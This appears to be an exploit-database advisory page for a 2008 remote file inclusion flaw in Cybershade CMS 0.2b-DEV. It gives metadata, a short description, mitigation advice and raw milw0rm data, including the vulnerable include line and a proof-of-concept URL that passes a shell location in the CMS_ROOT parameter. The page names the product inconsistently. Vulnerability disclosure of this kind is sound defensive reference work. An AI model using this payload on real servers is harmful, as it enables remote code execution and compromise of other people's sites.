header-logo
Suggest Exploit
vendor:
Cybershade CMS
by:
Kezzap66345 - Septemb0x
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Cybershade CMS
Affected Version From: 0.2b-DEV
Affected Version To: 0.2b-DEV
Patch Exists: YES
Related CWE: N/A
CPE: a:cybershade:cybershade_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Cybershare CMS

Cybershare CMS is vulnerable to a Remote File Inclusion vulnerability due to a lack of proper sanitization of user-supplied input. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server, which will then include and execute the attacker-specified file.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

Script Name : Cybershare CMS
 
Download : http://sourceforge.net/project/downloading.php?group_id=213056&use_mirror=surfnet&filename=cybershade_0.2b-DEV.zip&40561526
 
Error :
include $CMS_ROOT."core/core.php";
 
Vul. Code : htp://[site]/[path]/core/includes.php?CMS_ROOT=[Shell]
 
Thanks : Kezzap66345 - Septemb0x

# milw0rm.com [2008-10-31]

Navigation

Suggest Exploit

Services By CQR